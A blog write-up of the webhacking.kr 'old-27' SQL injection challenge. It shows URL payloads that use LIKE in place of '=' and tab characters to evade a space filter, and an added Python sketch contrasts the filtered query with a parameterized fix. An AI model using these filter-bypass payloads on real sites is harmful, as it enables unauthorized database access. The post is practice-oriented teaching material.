Planet DesKel

DesKel's official page for CTF write-ups, electronics tutorials, reviews, etc.

5 September 2020

Webhacking.kr write-up: old-27

| Link   | Point | Tag  |
|--------|-------|------|
| old-27 | 150   | SQLi |

Welcome back to another good SQLi challenge by webhacking.kr.

[Screenshot: question]

Let’s check the source code.

[Screenshot: code]

It looks like the script has some filters and an SQL query. Judging by the query, one might think the proper URL-based SQLi payload should look like this:

?no=2) or id='admin'--

Since the space character (0x20) and the equals sign (=) are filtered out, we need to think of another way. One option is to use the LIKE operator in place of the equals sign, such that

?no=2) or no like 2--

Meanwhile, the filter on the space character can be bypassed by using the tab character (0x09) instead:

?no=2)%09or%09no%09like%092--%09

A space after the two dashes (--) is required by some SQL databases, which is why the payload ends with %09.

[Screenshot: solve]
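Why the filter described above fails, and what fixes it, as an added example that is not part of the original write-up or the challenge's own code. It is a Python/sqlite3 sketch in which the table `chall`, its rows, the blacklist regex and all function names are assumptions; the query shape is inferred from the payloads above.

```python
import re
import sqlite3

# URL-decoded form of the final payload in the write-up (%09 is a tab).
PAGE_PAYLOAD = "2)\tor\tno\tlike\t2--\t"

def make_db():
    # Constructed stand-in for the challenge database (assumption).
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE chall (id TEXT, no INTEGER)")
    db.executemany("INSERT INTO chall VALUES (?, ?)",
                   [("guest", 1), ("admin", 2)])
    return db

# Hypothetical blacklist covering only the two characters the write-up
# names as filtered: the space (0x20) and the equals sign.
BLACKLIST = re.compile(r"[ =]")

def lookup_blacklist(db, no):
    """Weak form: reject listed characters, then concatenate into SQL."""
    if BLACKLIST.search(no):
        return "blocked"
    sql = "SELECT id FROM chall WHERE id='guest' AND no=(" + no + ")"
    row = db.execute(sql).fetchone()
    return row[0] if row else None

def lookup_parameterized(db, no):
    """Hardened form: allow-list the input as an integer and bind it."""
    if not re.fullmatch(r"[0-9]{1,9}", no):
        return "rejected"
    row = db.execute(
        "SELECT id FROM chall WHERE id='guest' AND no=?", (int(no),)
    ).fetchone()
    return row[0] if row else None

if __name__ == "__main__":
    db = make_db()
    # The first payload from the write-up contains a space and '='.
    print(lookup_blacklist(db, "2) or id='admin'--"))
    # Tab and LIKE are not on the blacklist, so the query logic changes.
    print(lookup_blacklist(db, PAGE_PAYLOAD))
    # With validation and a bound parameter the same input never
    # reaches the SQL parser as syntax.
    print(lookup_parameterized(db, PAGE_PAYLOAD))
    print(lookup_parameterized(db, "1"))
```

The blacklist stops only the exact characters it lists, while the bound parameter removes the injection point regardless of which whitespace or operator the input uses.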

tags: webhacking.kr - sqli

© 2020 DesKel